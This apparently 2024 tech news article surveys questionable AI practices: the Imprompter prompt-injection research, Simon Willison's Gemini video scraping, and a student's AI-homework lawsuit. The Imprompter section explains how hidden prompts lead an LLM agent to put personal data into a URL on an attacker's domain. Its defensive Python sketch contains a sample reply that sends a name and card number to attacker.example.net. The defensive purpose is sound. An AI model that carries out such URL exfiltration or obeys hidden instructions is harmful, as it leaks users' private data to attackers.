
Emerging Technology
Into The World Of Questionable AI Practices
Updated on Fri, Oct 18, 2024
Recently, we reported that Accel’s Euroscape 2024 noted that 40% of venture capital funding for European cloud companies is now being directed toward GenAI startups. While this has eaten into the money available for other cloud technologies, the report also found that AI investment has improved the overall outlook for the rest of the industry.
It’s no secret that AI and GenAI are revolutionizing industries and turning more than just a few heads.
However, at the same time, it’s leading companies to transform employee roles and, in some cases, even replace them.
This was expected, with a wide range of industry leaders pointing out that the technology will not just replace people in some processes but also replace some processes entirely. Most prominently, NVIDIA CEO Jensen Huang has said that the need for human coders could soon be a thing of the past.
Yet, questions must be asked about the ill effects and drawbacks of AI. Here, personal safety comes into the picture, since even people with no connection to the technology can be affected, as was the case when it emerged that millions of people were using AI bots to create deepfake nudes on Telegram.
Elsewhere, the world of AI has seen a range of questionable practices that may not necessarily be illegal or harmful but certainly raise questions about how the technology is used.
AI Tools For Extracting Personal Details
Researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore developed an attack algorithm that turns a malicious prompt into a set of hidden instructions, directing an LLM to gather a user’s personal information from a chat and send it to hackers.
This includes information such as names, ID numbers, payment card details, email addresses, mailing addresses and more.
Called Imprompter, the algorithm instructs the LLM to find personal information and attach it to a URL pointing at the attacker’s domain. According to the researchers, the attack had an 80% success rate.
Xiaohan Fu, the lead author of the research and a computer science PhD student at UCSD, said, “The effect of this particular prompt is essentially to manipulate the LLM agent to extract personal information from the conversation and send that personal information to the attacker’s address. We hide the goal of the attack in plain sight.”
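The exfiltration channel here is the URL itself: once the model embeds conversation data into a link pointing at an attacker-controlled domain, fetching or rendering that link leaks the data. Below is a minimal defensive sketch (illustrative only, not the researchers' code, and the allowlisted domain is an assumption) showing how an application could flag markdown image links in LLM output that point outside its own domains before rendering them:

```python
import re

# Hypothetical allowlist: domains the application itself is expected to link to.
ALLOWED_DOMAINS = {"example.com"}

# Markdown image syntax (![alt](url)) is a common exfiltration channel,
# because clients auto-fetch the URL, sending its query string to the server.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def flag_suspicious_urls(llm_output: str) -> list[str]:
    """Return URLs in the model's output that point outside the allowlist."""
    suspicious = []
    for url in MD_IMAGE.findall(llm_output):
        domain = url.split("/")[2].lower()
        if domain not in ALLOWED_DOMAINS:
            suspicious.append(url)
    return suspicious

# A reply carrying personal data in a query string to an attacker's server:
reply = "Sure! ![img](https://attacker.example.net/log?name=Jane&card=4111)"
print(flag_suspicious_urls(reply))
```

A check like this only covers one exfiltration path, of course; the research shows the underlying problem is that obfuscated prompts can steer the model itself, so output filtering is a mitigation rather than a fix.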
AI Tools For Video Scraping
In a recent blog post, AI researcher Simon Willison tested a technique he calls "video scraping" to extract data from cloud service emails. Instead of manually copying scattered charges from twelve emails, he recorded a 35-second screen capture and fed it into Google's AI Studio.
Then, using the Gemini 1.5 Flash AI model, he instructed the tool to pull relevant dates and charges and convert the data into a JSON format, which Willison later formatted as a CSV for spreadsheet use.
The process was successful and incredibly cost-effective: it used just 11,018 tokens, which would have cost less than a tenth of a cent, and Willison ended up paying nothing at all, as Google AI Studio currently offers free usage. However, it also raises privacy questions.
While Willison used the technique for his own needs and decided what content would be captured, if bad actors were to gain access to a user’s machine, the same approach would enable a new form of privacy invasion and autonomous spying.
As such, this could enable hackers to access recorded data in one place and act on it later.
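The final step of Willison's workflow, turning the model's JSON output into a CSV for spreadsheet use, can be sketched in a few lines of Python. This is a minimal illustration: the field names and sample records are assumptions, not his exact schema or data.

```python
import csv
import io
import json

# Assumed shape of the model's JSON output: a list of records with
# date, description, and amount fields (illustrative, not Willison's schema).
gemini_json = """[
  {"date": "2024-10-01", "description": "Cloud storage", "amount": 0.42},
  {"date": "2024-10-05", "description": "Compute", "amount": 1.87}
]"""

charges = json.loads(gemini_json)

# Write the records out as CSV, ready to paste into a spreadsheet.
buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=["date", "description", "amount"])
writer.writeheader()
writer.writerows(charges)
print(buf.getvalue())
```

The model does the hard part (reading the charges off the video frames); the conversion afterward is ordinary data plumbing.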
AI Tools For Homework
A student from Hingham High School in Massachusetts was punished for using AI tools in an assignment, prompting the boy’s parents to sue the school district.
The parents allege that nowhere in the handbook does any rule restrict the use of AI. #UnoReverse
Jennifer and Dale Harris, the boy’s parents, filed the lawsuit in Plymouth County Superior Court, and the case was then moved to the US District Court for the District of Massachusetts.
“They told us our son cheated on a paper, which is not what happened,” said Jennifer Harris, adding, “They basically punished him for a rule that doesn't exist.”
On the other hand, school officials said that the boy admitted to using AI tools to generate ideas and more. They also pointed out that the student handbook’s section on cheating and plagiarism bans the “unauthorized use of technology during an assignment” and the “unauthorized use or close imitation of the language and thoughts of another author and the representation of them as one's own work.”
Beyond the handbook, the officials cited a “written policy on Academic Dishonesty and AI expectations” that was shared with students in fall 2023. The policy stated that students “shall not use AI tools during in-class examinations, processed writing assignments, homework or classwork unless explicitly permitted and instructed.”
While the court has yet to rule on whether the school’s action was lawful, the case raises concerns about the future of education and the harmful effects of taking shortcuts in a process meant to exercise students’ natural intellect rather than artificial intelligence.
Do you think governments and AI companies need to ascertain the future of AI and GenAI before proceeding with its growth, or should AI companies be allowed to explore where the technology goes without any restrictions?
Let us know in the comments below!
First published on Fri, Oct 18, 2024